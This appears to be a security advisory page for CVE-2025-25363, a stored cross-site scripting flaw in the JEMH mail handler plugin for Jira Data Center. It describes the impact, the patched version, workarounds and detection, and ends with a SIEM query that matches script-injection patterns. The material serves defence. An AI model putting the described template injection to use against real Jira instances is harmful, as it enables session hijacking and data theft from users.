CVE-2025-25363
📋 TL;DR
An authenticated stored cross-site scripting (XSS) vulnerability in The Plugin People Enterprise Mail Handler for Jira Data Center (JEMH) allows attackers with Administrator privileges to inject malicious JavaScript into HTML template fields. This JavaScript executes in the context of other users' browsers when they view affected templates. Only Jira Data Center instances running vulnerable JEMH versions are affected.
💻 Affected Systems
- The Plugin People Enterprise Mail Handler for Jira Data Center (JEMH)
📦 What is this software?
Enterprise Mail Handler by Thepluginpeople
⚠️ Risk & Real-World Impact
Worst Case
Administrator-level attacker could steal session cookies, perform actions as other users, redirect to malicious sites, or compromise Jira instance integrity.
Likely Case
Privilege escalation, session hijacking, or data exfiltration from users who view malicious templates.
If Mitigated
Limited impact if proper access controls restrict Administrator privileges to trusted personnel only.
🎯 Exploit Status
Exploitation requires authenticated Administrator access. Public GitHub repository contains proof-of-concept details.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 4.1.69-dc
Vendor Advisory: https://marketplace.atlassian.com/apps/4832/enterprise-mail-handler-for-jira-jemh/version-history?versionHistoryHosting=dataCenter
Restart Required: Yes
Instructions:
1. Log into Jira Data Center as Administrator. 2. Navigate to Manage apps/Add-ons. 3. Locate JEMH plugin. 4. Update to version 4.1.69-dc or later. 5. Restart Jira services.
🔧 Temporary Workarounds
Restrict Administrator Access
allLimit JEMH Administrator privileges to only essential, trusted personnel.
Input Validation
allImplement additional input validation/sanitization for HTML template fields.
🧯 If You Can't Patch
- Review and audit all users with JEMH Administrator privileges immediately.
- Implement Content Security Policy (CSP) headers to restrict script execution.
🔍 How to Verify
Check if Vulnerable:
Check JEMH plugin version in Jira Data Center admin interface. If version is below 4.1.69-dc, system is vulnerable.Check Version:
Check via Jira admin UI: Manage apps → Enterprise Mail Handler for Jira (JEMH) → VersionVerify Fix Applied:
Confirm JEMH version is 4.1.69-dc or higher after update. Test template HTML fields for XSS payload execution.📡 Detection & Monitoring
Log Indicators:
- Unusual template modifications by Administrator users
- JavaScript injection patterns in template update logs
Network Indicators:
- Unexpected external requests from Jira users' browsers
- Suspicious script loading in HTTP responses
SIEM Query:
source="jira.log" AND ("template" AND "update" AND ("script" OR "javascript" OR "onload" OR "onerror"))